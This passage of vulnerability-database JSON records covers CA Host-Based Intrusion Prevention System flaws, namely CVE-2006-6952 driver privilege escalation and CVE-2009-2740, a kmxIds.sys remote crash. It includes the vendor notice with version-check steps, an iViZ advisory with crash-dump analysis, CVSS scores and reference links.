"id": "20070124 [CAID 34818]: CA PERSONAL FIREWALL MULTIPLE PRIVILEGE ESCALATION VULNERABILITIES",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061116 [REVERSEMODE ADVISORY] COMPUTER ASSOCIATES HIPS DRIVERS - MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES.",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061121 RE: [REVERSEMODE ADVISORY] COMPUTER ASSOCIATES HIPS DRIVERS - MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES.",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "53998",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "29069",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "29070",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-82607",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-82608",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-23060",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52231",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"id": "VAR-200701-0265",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:09:52.450000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97729"
},
{
"trust": 1.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34818"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/21140"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/452286/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/30497"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/30498"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/22972"
},
{
"trust": 1.7,
"url": "http://www.reversemode.com/index.php?option=com_remository\u0026itemid=2\u0026func=fileinfo\u0026id=38"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/451952/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/458040/100/200/threaded"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6952"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-6952"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/451952/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/458040/100/200/threaded"
},
{
"trust": 0.3,
"url": "http://www.reversemode.com/index.php?option=com_remository\u0026itemid=2\u0026func=download\u0026id=38\u0026chk=23a19c23a44e6095e872e8b3f7fca9c8"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/451952"
},
{
"trust": 0.3,
"url": "/archive/1/452286"
},
{
"trust": 0.1,
"url": "http://www.reversemode.com/index.php?option=com_remository\u0026amp;itemid=2\u0026amp;func=fileinfo\u0026amp;id=38"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/22972/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12660/"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/products/48/?r=l"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/how_to_buy/15/?r=l"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.reversemode.com/index.php?option=com_content\u0026task=view\u0026id=27\u0026itemid=2"
},
{
"trust": 0.1,
"url": "http://osvdb.org/30498"
},
{
"trust": 0.1,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=116379521731676\u0026w=2"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www3.ca.com/legal/"
},
{
"trust": 0.1,
"url": "http://crm.my-etrust.com/login.asp?username=guest\u0026target=document\u0026openparameter=2680"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/30497"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/contact/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-6952"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/securityadvisor/vulninfo/submit.aspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-23060"
},
{
"date": "2006-11-16T00:00:00",
"db": "BID",
"id": "21140"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"date": "2006-11-17T23:30:18",
"db": "PACKETSTORM",
"id": "52231"
},
{
"date": "2007-01-27T03:02:12",
"db": "PACKETSTORM",
"id": "53998"
},
{
"date": "2006-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"date": "2007-01-24T23:28:00",
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-23060"
},
{
"date": "2007-01-25T22:29:00",
"db": "BID",
"id": "21140"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"date": "2007-01-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "21140"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
],
"trust": 1.0
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates HIPS Driver Core kmxstart.sys Vulnerabilities in which user privileges are acquired",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "21140"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
],
"trust": 0.9
}
}
VAR-200908-0478
Vulnerability from variot - Updated: 2025-04-10 23:09kmxIds.sys before 7.3.1.18 in CA Host-Based Intrusion Prevention System (HIPS) 8.1 allows remote attackers to cause a denial of service (system crash) via a malformed packet. Computer Associates Host-Based Intrusion Prevention System is affected by a denial-of-service vulnerability because the application mishandles malformed user-supplied input. A remote attacker may exploit this issue to cause denial-of-service conditions. Host-Based Intrusion Prevention System 8.1 is affected by this issue; other versions may also be vulnerable. CA HIPS integrates functions such as firewall, intrusion detection, intrusion protection, operating system security and application control to provide centralized active security protection. -----BEGIN PGP SIGNED MESSAGE-----
CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System
Issued: August 18, 2009
CA's technical support is alerting customers to a security risk with CA Host-Based Intrusion Prevention System. CA has issued a patch to address the vulnerability.
The vulnerability, CVE-2009-2740, is due to the kmxIds.sys driver not correctly handling certain malformed packets. An attacker can send a malicious packet that will cause a kernel crash. Using Windows Explorer, locate the file "kmxIds.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable.
File Name Version Size(bytes) Date
kmxIds.sys 7.3.1.18 163,840 June 03, 2009, 12:32:22 PM
Solution
CA has issued the following patch to address the vulnerability.
References
CVE-2009-2740 - HIPS kmxIds.sys remote crash http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2740
CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21 4665
Acknowledgement
CVE-2009-2740 - iViZ Security Research Team
Change History
Version 1.0: Initial Release
If additional information is required, please contact CA Support at http://support.ca.com/
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782
Kevin Kotas CA Product Vulnerability Response Team
-----BEGIN PGP SIGNATURE----- Version: PGP 8.1
iQEVAwUBSosQJJI1FvIeMomJAQFFEAf+IcKJCxu2tj2cO24u8Hp3nQIeCyAAJITU Fdsmn/RRDNKPXm6fCPVbeK7rnvCGRuSmEOXPT+H+Y8S5ruppUqf4kuehkvhaW3N+ m5xjiC4BnACtPO6HE2q4JelgAdb0mKWIWnbn6ydWXKvBKViUQU4cAirCxRw7zj7P lrfm+V6hun7s6FTF7IccdGTJDhxXOCo9Q++FGLaOvaXJiXSS+HvzTM7MzbAEa5yy TosaTPGrnYO8FzQz+P/HFlCYsD6IKjCfMy1C63Qp7xCFWZ6ltJSKEIUYLu/DJlWu z2JUzNXn4lqNXoDLOAuBHawMiJesPXshjFqFG0kdeRxvP4JMUhENOQ== =AsHd -----END PGP SIGNATURE----- . ---------------------------------------------------------------------------------------------------
[ iViZ Security Advisory 09-005 19/08/2009 ]
iViZ Techno Solutions Pvt. http://www.ivizsecurity.com
- Title: CA HIPS kmxids.sys Remote Kernel Vulnerability
- Software: CA HIPS r8.1
--[ Synopsis:
CA HIPS is a Host Based Intrusion Prevention System in which managed agents are deployed on individual hosts to be protected by the HIPS and controlled by the centralized console.
--[ Affected Software:
- CA HIPS r8.1 (possibly older versions too)
Tested on:
- Agent Product Version: 1.5.290
- Agent Engine Version: 1.5.286
--[ Technical description:
When CA HIPS agent processes certain malformed IP packets, it fails to handle certain boundary condition during parsing and pattern matching of the packet. It is possible to force the kernel driver (kmxids.sys) responsible for analyzing each in/out packet to reference invalid/unmapped memory.
The following information is obtained during crash analysis:
CURRENT_IRQL: 2
FAULTING_IP: kmxids+a2f4 f6b8c2f4 8a26 mov ah,byte ptr [esi]
DEFAULT_BUCKET_ID: DRIVER_FAULT
BUGCHECK_STR: 0xD1
TRAP_FRAME: f88ca4f4 -- (.trap 0xfffffffff88ca4f4) ErrCode = 00000000 eax=f88ca754 ebx=81f7415a ecx=00000003 edx=428c200c esi=6e96d603 edi=f6b83264 eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 kmxids+0xa2f4: f6b8c2f4 8a26 mov ah,byte ptr [esi] ds:0023:6e96d603=?? Resetting default scope
LAST_CONTROL_TRANSFER: from 804f7b9d to 80527bdc
STACK_TEXT: f88ca0a8 804f7b9d 00000003 f88ca404 00000000 nt!RtlpBreakWithStatusInstruction f88ca0f4 804f878a 00000003 6e96d603 f6b8c2f4 nt!KiBugCheckDebugBreak+0x19 f88ca4d4 80540683 0000000a 6e96d603 00000002 nt!KeBugCheck2+0x574 f88ca4d4 f6b8c2f4 0000000a 6e96d603 00000002 nt!KiTrap0E+0x233 WARNING: Stack unwind information not available. Following frames may be wrong. f88ca574 f6b832e1 6e96d603 f6b83264 00000003 kmxids+0xa2f4 00000000 00000000 00000000 00000000 00000000 kmxids+0x12e1
The issue can be used to create a Denial of Service condition on each of the host protected by affected versions of CA HIPS agent, however due to the nature of the vulnerability remote code execution is unlikely
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200908-0478",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.1"
},
{
"model": "associates host-based intrusion prevention system",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates host-based intrusion prevention system cf",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "8.11"
}
],
"sources": [
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:host-based_intrusion_prevention_system",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kevin Kotas",
"sources": [
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
],
"trust": 0.7
},
"cve": "CVE-2009-2740",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2009-2740",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-40186",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-2740",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2009-2740",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200908-275",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-40186",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "kmxIds.sys before 7.3.1.18 in CA Host-Based Intrusion Prevention System (HIPS) 8.1 allows remote attackers to cause a denial of service (system crash) via a malformed packet. Computer Associates Host-Based Intrusion Prevention System is affected by a denial-of-service vulnerability because the application mishandles malformed user-supplied input. \nA remote attacker may exploit this issue to cause denial-of-service conditions. \nHost-Based Intrusion Prevention System 8.1 is affected by this issue; other versions may also be vulnerable. CA HIPS integrates functions such as firewall, intrusion detection, intrusion protection, operating system security and application control to provide centralized active security protection. -----BEGIN PGP SIGNED MESSAGE-----\n\nCA20090818-01: Security Notice for CA Host-Based Intrusion Prevention\nSystem\n\nIssued: August 18, 2009\n\nCA\u0027s technical support is alerting customers to a security risk with\nCA Host-Based Intrusion Prevention System. CA\nhas issued a patch to address the vulnerability. \n\nThe vulnerability, CVE-2009-2740, is due to the kmxIds.sys driver not\ncorrectly handling certain malformed packets. An attacker can send a\nmalicious packet that will cause a kernel crash. Using Windows Explorer, locate the file \"kmxIds.sys\". By\ndefault, the file is located in the\n\"C:\\Windows\\system32\\drivers\\\" directory. \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is less than indicated in the below table, the\ninstallation is vulnerable. \n\nFile Name\nVersion\nSize(bytes)\nDate\n\nkmxIds.sys\n7.3.1.18\n163,840\nJune 03, 2009, 12:32:22 PM\n\nSolution\n\nCA has issued the following patch to address the vulnerability. \n\nReferences\n\nCVE-2009-2740 - HIPS kmxIds.sys remote crash\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2740\n\nCA20090818-01: Security Notice for CA Host-Based Intrusion Prevention\nSystem\n(line may wrap)\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21\n4665\n\nAcknowledgement\n\nCVE-2009-2740 - iViZ Security Research Team\n\nChange History\n\nVersion 1.0: Initial Release\n\nIf additional information is required, please contact CA Support at\nhttp://support.ca.com/\n\nIf you discover a vulnerability in CA products, please report your\nfindings to the CA Product Vulnerability Response Team. \n(line may wrap)\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17\n7782\n\nKevin Kotas\nCA Product Vulnerability Response Team\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQEVAwUBSosQJJI1FvIeMomJAQFFEAf+IcKJCxu2tj2cO24u8Hp3nQIeCyAAJITU\nFdsmn/RRDNKPXm6fCPVbeK7rnvCGRuSmEOXPT+H+Y8S5ruppUqf4kuehkvhaW3N+\nm5xjiC4BnACtPO6HE2q4JelgAdb0mKWIWnbn6ydWXKvBKViUQU4cAirCxRw7zj7P\nlrfm+V6hun7s6FTF7IccdGTJDhxXOCo9Q++FGLaOvaXJiXSS+HvzTM7MzbAEa5yy\nTosaTPGrnYO8FzQz+P/HFlCYsD6IKjCfMy1C63Qp7xCFWZ6ltJSKEIUYLu/DJlWu\nz2JUzNXn4lqNXoDLOAuBHawMiJesPXshjFqFG0kdeRxvP4JMUhENOQ==\n=AsHd\n-----END PGP SIGNATURE-----\n. ---------------------------------------------------------------------------------------------------\n\n[ iViZ Security Advisory 09-005 19/08/2009 ]\n---------------------------------------------------------------------------------------------------\n\niViZ Techno Solutions Pvt. \n http://www.ivizsecurity.com\n------------------------------------------------------------------------------------------\n\n\n * Title: CA HIPS kmxids.sys Remote Kernel Vulnerability\n * Software: CA HIPS r8.1\n\n--[ Synopsis:\n\n CA HIPS is a Host Based Intrusion Prevention System in which managed\nagents\n are deployed on individual hosts to be protected by the HIPS and\ncontrolled\n by the centralized console. \n\n--[ Affected Software:\n\n * CA HIPS r8.1 (possibly older versions too)\n\n Tested on:\n\n * Agent Product Version: 1.5.290\n * Agent Engine Version: 1.5.286\n\n--[ Technical description:\n\n When CA HIPS agent processes certain malformed IP packets, it fails\nto handle\n certain boundary condition during parsing and pattern matching of the\npacket. \n It is possible to force the kernel driver (kmxids.sys) responsible for\n analyzing each in/out packet to reference invalid/unmapped memory. \n\n The following information is obtained during crash analysis:\n\n ------\n CURRENT_IRQL: 2\n\n FAULTING_IP:\n kmxids+a2f4\n f6b8c2f4 8a26 mov ah,byte ptr [esi]\n\n DEFAULT_BUCKET_ID: DRIVER_FAULT\n\n BUGCHECK_STR: 0xD1\n\n TRAP_FRAME: f88ca4f4 -- (.trap 0xfffffffff88ca4f4)\n ErrCode = 00000000\n eax=f88ca754 ebx=81f7415a ecx=00000003 edx=428c200c esi=6e96d603\nedi=f6b83264\n eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz\nna pe nc\n cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000\nefl=00010206\n kmxids+0xa2f4:\n f6b8c2f4 8a26 mov ah,byte ptr [esi]\n ds:0023:6e96d603=??\n Resetting default scope\n\n LAST_CONTROL_TRANSFER: from 804f7b9d to 80527bdc\n\n STACK_TEXT:\n f88ca0a8 804f7b9d 00000003 f88ca404 00000000\n nt!RtlpBreakWithStatusInstruction\n f88ca0f4 804f878a 00000003 6e96d603 f6b8c2f4\nnt!KiBugCheckDebugBreak+0x19\n f88ca4d4 80540683 0000000a 6e96d603 00000002 nt!KeBugCheck2+0x574\n f88ca4d4 f6b8c2f4 0000000a 6e96d603 00000002 nt!KiTrap0E+0x233\n WARNING: Stack unwind information not available. Following frames may be\n wrong. \n f88ca574 f6b832e1 6e96d603 f6b83264 00000003 kmxids+0xa2f4\n 00000000 00000000 00000000 00000000 00000000 kmxids+0x12e1\n ------\n\n The issue can be used to create a Denial of Service condition on each\nof the\n host protected by affected versions of CA HIPS agent, however due to the\n nature of the vulnerability remote code execution is unlikely",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-40186",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-2740",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20090818 CA20090818-01: SECURITY NOTICE FOR CA HOST-BASED INTRUSION PREVENTION SYSTEM",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275",
"trust": 0.6
},
{
"db": "BID",
"id": "36078",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "80488",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "80522",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-40186",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"id": "VAR-200908-0478",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:09:14.973000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "214665",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214665"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-399",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
